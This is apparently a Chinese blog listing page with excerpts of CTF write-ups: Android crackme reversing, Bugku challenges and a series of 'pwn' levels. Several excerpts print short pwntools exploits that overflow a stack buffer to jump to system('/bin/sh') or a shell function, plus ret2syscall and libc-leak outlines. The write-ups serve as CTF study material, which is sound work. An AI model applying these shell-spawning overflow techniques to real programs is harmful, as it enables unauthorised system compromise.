- 博客(13)
- 收藏
- 关注
原创 Xman签到题
反编译后找到MainActivity,关键代码如下:可以看出将输入字符串加密取反后与=kFBUShIf5IBT9GHfCEy比较进入MyBase()这里把base64的编码表改了,可以先将字符串还原为默认base64在解密脚本如下:import base64bs_str = "=kFBUShIf5IBT9GHfCEy"[::-1]strbase=''base_table=''b...
2019-04-07 16:23:19
401
原创 pwn7第七关
前面几个懒得写了,直接第七个吧,溢出点和前面一样get()函数,112字节,保护只开了NX程序本身没有system(),也没有/bin/sh,且栈不可执行,用ROPgadget也没找到有用的语句,但是程序是动态链接的,运行时会加载so库,可以用put()泄露出put的真实地址,又因为ASLR随机化不了地址底12位,可以用put真实地址的底12位查询加载的那个版本的libc.so,以及确定libc的...
2019-04-03 23:20:46
520
原创 pwn3第三关
溢出点,保护都和上一关一样,这一关有外部函数system()和字符串/bin/sh,exp如下:from pwn import *elf=ELF('./pwn3')p=process('./pwn3')payload='a'*112+p32(elf.plt['system'])+p32(0x11111111)+p32(0x08048720)#0x111111是返回地址,0x080487...
2019-03-30 15:21:25
327
原创 pwn2第二关
在这一关中,没有可以直接利用的system()函数让我们直接调用了。我们可以学习使用系统调用来进行操作。首先看一下保护情况,只开了NX,同样是get()存在溢出syscall的函数调用规范为execve("/bin/sh",0,0)汇编语句如下pop ax # 系统调用号载入, execve为0xbpop bx #/bin/shpop cx #0pop dx ...
2019-03-29 11:57:13
3216
原创 pwn1第一关
检查程序,发现是32位,开了NX保护拖入ida32get()存在溢出,gdb调试偏移112字节后覆盖返回地址,程序本身有调用system函数,exp如下:from pwn import *p=process('./pwn1')payload='a'*112+p32(0x0804863A)p.recvline()p.sendline(payload)p.interactive(...
2019-03-28 21:31:21
518
原创 [pwn]bugku pwn2
首先检查了一下保护机制,发现几乎啥保护都没有,ida查看一下read()函数存在溢出,然后又看了一下发现main函数下面有一个get_shell_函数,点进去看了看应该是让返回地址覆盖成getshell地址,gdb看一下偏移rbp前四位为bAA1,算一下偏移到rbp偏移为48,向上8字节是父函数rbp,所以偏移56覆盖到返回地址,get_shell_地址为exp如下:from pwn ...
2019-03-26 16:46:35
5745
4
原创 Bugku Timer(阿里CTF)
这是一道安卓题,大致意思是过二十万秒后给出flag,关键代码如上,可以写个脚本模拟过完二十万秒,输出k,package com.test;public class text { public static void main(String[] args) { int k = 0; for(int time =200000;time>0;time-...
2019-02-28 21:43:25
1391
原创 Bugku 游戏过关
打开以后不知道是个什么游戏,拖入ida,查看字符串,看到双击进入查看交叉引用,定位关键代码,看样子是个函数,记下偏移地址,od打开,跟踪的输入随便输入,在下面随便找个跳转调到偏移e940出,程序输出flag...
2019-02-28 20:37:33
629
原创 一个简单的Android Crackme分析(二)
一个简单的Android Crackme分析(二)首先,安装apk,adb install xx.apk,运行apk,随便输入,提示错误,把apk拖入Androidkiller,反编译成功,搜索关键字错误:根据name查找id搜索id定位关键点smali代码如下.method public onClick(Landroid/view/View;)V .locals 4 .p...
2019-02-12 17:16:42
486
原创 一个简单的Android Crackme分析
一个简单的Android Crackme分析首先将apk拖入Androidkiller,不知道什么原因报错,一开始以为是apktool版本太老,更新版本后依旧报错,如果有大佬知道原因还望告知,如图:既然Androidkiller用不了,那就用dex2jar手动编译,将dex解压,打开cmd输入d2j-baksmali.bat classes.dex,反编译成功,接着输入d2j-dex2jar...
2019-02-11 17:38:27
778
空空如也
空空如也
TA创建的收藏夹 TA关注的收藏夹
TA关注的人
RSS订阅